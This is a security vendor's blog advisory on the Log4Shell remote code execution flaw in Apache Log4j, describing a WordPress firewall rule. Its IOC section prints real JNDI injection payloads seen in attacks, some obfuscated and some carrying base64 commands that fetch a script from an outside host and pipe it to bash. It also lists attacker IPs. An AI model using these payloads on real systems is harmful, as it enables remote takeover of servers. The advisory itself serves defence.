Extremely Critical Vulnerability In The Apache Log4j Logging Library

Published 13 December 2021
Updated 20 July 2023
Dave Jong
CTO at Patchstack
Table of Contents

Recently, an extremely critical remote code execution vulnerability was made public for the Apache Log4j logging library.

If an organization or software made use of Apache Log4j logging library and the vulnerable version was running, it made it possible for malicious people to remotely execute commands which in many cases required no pre-requisites.

A comprehensive list of software that is vulnerable can be found here.

Even though we don't expect many, if any, of our customers to be vulnerable to this vulnerability, Patchstack also published a firewall rule in order to protect WordPress sites that rely on some sort of Java application under the hood that uses this library.

Extremely Critical Vulnerability In The Apache Log4j Logging Library Image from cyber.gov.rw

Although requests still get logged (in the access and/or error logs) by the webserver, it might just be enough to protect some of our customers against the potential successful exploitation of this vulnerability.

IOC

As we added the firewall rule, we quickly noticed a rapid increase in blocked attacks. Below we will describe some of the payloads we have seen.

These payloads were present in different ways, some examples include the User-Agent header, X-Forwarded-For header, in the URL, and as a raw POST payload.

${jndi:ldap://158.69.204.95:1389/Basic/Command/Base64/KGN1cmwgLVMgaHR0cHM6Ly93d3cuZWNvbi1qb2JzLmNvbS9TY3JpcHRzL29wLnBocHx8d2dldCBodHRwczovL3d3dy5lY29uLWpvYnMuY29tL1NjcmlwdHMvb3AucGhwKXxiYXNo}
borchuk/3.1 ${jndi:ldap://167.172.44.255:389/LegitimateJavaClass}
${jndi:ldap://193.3.19.159:53/c}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDUuMTQ3Ljk5LjgyOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzIwNS4xNDcuOTkuODI6ODApfGJhc2g=}
/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDUuMTQ3Ljk5LjgyOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzIwNS4xNDcuOTkuODI6ODApfGJhc2g=}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rcn7dmk1uddter15kgcg5c3xebsy474.interactsh.com}

Most attacks came from 2 IP addresses: 47.251.46.249 and 195.54.160.149 covered about 15% of each of all attacks that we have seen.

Install a firewall to prevent exploitations

Vulnerabilities like this show just how difficult it can be to always be protected from all vulnerabilities at all times. The public was only made aware of this because of the publicization of this vulnerability.

Had this not happened, it could've had a significant impact on the security state of many organizations.

A vulnerability can always be lurking around the corner and often you cannot do much about it until the vendor publishes a patch for it.

Even though we do not protect Java applications, it is still good to rely on a firewall to prevent your website or application from being exploited while you are waiting on information on how to patch or update the vulnerable software.

The latest in Security Advisories

Looks like your browser is blocking our support chat widget. Turn off adblockers and reload the page.
crossmenu